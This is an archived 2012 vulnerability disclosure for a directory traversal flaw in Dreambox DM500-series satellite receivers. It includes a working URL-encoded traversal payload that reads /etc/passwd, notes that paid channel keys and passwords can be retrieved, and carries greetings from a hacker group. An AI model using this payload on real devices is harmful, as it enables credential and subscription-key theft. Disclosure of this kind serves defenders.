Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27678
HistoryFeb 15, 2012 - 12:00 a.m.

FW: mutant200s DreamBox Arbitrary File Download Vulnerability

2012-02-1500:00:00
vulners.com
51

Exploit Title: mutant200s DreamBox Arbitrary File Download Vulnerability

Google Dork:

Date: 30/01 /2012

Author: k3vin mitnick

Software Link:

Version:

Tested on:

CVE :

DreamBox DM500(+) Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, etc.
Tested on: Linux dreambox 2.6.17-mutant200s
Vulnerability discovered by: k3vin mitnick
website : http://tunisianblackhat.blogspot.com/
exploit :
http://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

greetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack ,
scraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki … and all tunisia hackers
30/01/2012

K3VIN MITNICK - TUNISIAN BLACKHAT-

From: [email protected]
To: [email protected]
Subject: mutant200s DreamBox Arbitrary File Download Vulnerability
Date: Sun, 29 Jan 2012 23:13:19 +0000

K3VIN MITNICK - TUNISIAN BLACKHAT-